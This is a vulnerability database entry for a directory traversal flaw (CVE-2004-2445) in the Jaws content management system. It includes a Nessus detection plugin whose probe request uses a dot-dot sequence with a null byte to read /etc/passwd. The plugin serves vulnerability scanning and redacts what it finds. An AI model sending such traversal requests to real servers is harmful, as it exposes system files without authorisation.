CVE-2004-2445 - Input Validation vulnerability in Jaws 0.3 Beta

CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
jaws
nessus
exploit available

Summary

Directory traversal vulnerability in index.php in Jaws 0.3 BETA allows remote attackers to view arbitrary files via a .. (dot dot) in the gadget parameter.

Vulnerable Configurations

Part Description Count
Application
Jaws
1

Exploit-Db

description: JAWS 0.2/0.3 index.php gadget Parameter Traversal Arbitrary File Access. CVE-2004-2445. Webapps exploit for php platform
id: EDB-ID:24255
last seen: 2016-02-02
modified: 2004-07-06
published: 2004-07-06
reporter: Fernando Quintero
source: https://www.exploit-db.com/download/24255/
title: JAWS 0.2/0.3 index.php gadget Parameter Traversal Arbitrary File Access

Nessus

NASL family: CGI abuses
NASL id: JAWS_MULTIPLE_FLAWS.NASL
description: The remote web server is running JAWS, a content management system written in PHP. Input to the …
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 16198
published: 2005-01-18
reporter: This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/16198
title: JAWS index.php gadget Parameter Traversal Arbitrary File Access
code:
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


# Registration branch. When the engine loads the plugin with the
# 'description' global set, only the metadata below is recorded and the
# script exits here, so the network check further down never runs in
# that mode.
if(description)
{
 script_id(16198);
 script_cve_id("CVE-2004-2445");
 script_bugtraq_id(10670);

 script_version("1.18");
 script_name(english:"JAWS index.php gadget Parameter Traversal Arbitrary File Access");
 script_summary(english:"Checks for a file reading flaw in JAWS");
 
 script_set_attribute( attribute:"synopsis", value:
"A web application running on the remote host has a directory
traversal vulnerability." );
 script_set_attribute( attribute:"description", value:
"The remote web server is running JAWS, a content management system
written in PHP.

Input to the 'gadget' parameter of index.php is not properly
sanitized.  A remote attacker could exploit this to read potentially
sensitive data from the system.  This information could also be used
to mount further attacks.

This version of JAWS also reportedly has cross-site scripting and
authentication bypass vulnerabilities, though Nessus has not checked
for those issues." );
 script_set_attribute(attribute:"see_also",
   value:"https://seclists.org/fulldisclosure/2004/Jul/271");
 script_set_attribute(attribute:"solution", 
   value:"Upgrade to the latest version of this software." );
 # Base vector: network, low complexity, no auth, partial confidentiality
 # impact only -- matches the CVSS 5.0 rating of the CVE.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/01/18");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/07/05");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 # Ends the attribute section.
 script_end_attributes();

 # Information-gathering probe (a single GET per CGI directory); it is
 # scheduled after http_version.nasl, needs a www service (default 80)
 # and is not run when the Settings/disable_cgi_scanning key is set.
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");

 # Do not fall through to the check when only registering metadata.
 exit(0);
}

# Check starts here

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

# Detection check. One GET per known CGI directory; the first body that
# looks like a passwd(5) root entry is reported (redacted) and the
# script stops. A server that does not answer aborts the whole check.
port = get_http_port(default:80);

foreach cgi_dir (cgi_dirs())
{
  # Probe path for the 'gadget' parameter, as used by the original plugin.
  req_path = cgi_dir + '/index.php?gadget=../../../../../../etc/passwd%00&path=/etc';
  resp = http_send_recv3(method:"GET", item:req_path, port:port);
  if (isnull(resp)) exit(1, "The server didn't respond.");

  # resp[2] is the response body; only a root account line counts as a hit.
  if (!egrep(pattern:"root:.*:0:[01]:.*:.*:", string:resp[2])) continue;

  # Never copy raw account data into the report.
  resp[2] = data_protection::redact_etc_passwd(output:resp[2]);

  # Quiet mode: flag the port without any detail.
  if (report_verbosity <= 0)
  {
    security_warning(port:port);
    exit(0);
  }

  # Verbose mode: show the request; very verbose mode adds the (redacted)
  # body as evidence.
  report = string(
    "\nNessus detected this by requesting the following URL :\n\n",
    "  ", build_url(qs:req_path, port:port), "\n"
  );
  if (report_verbosity > 1)
    report += string("\nWhich yielded :\n\n", resp[2], "\n");

  security_warning(port:port, extra:report);
  exit(0);
}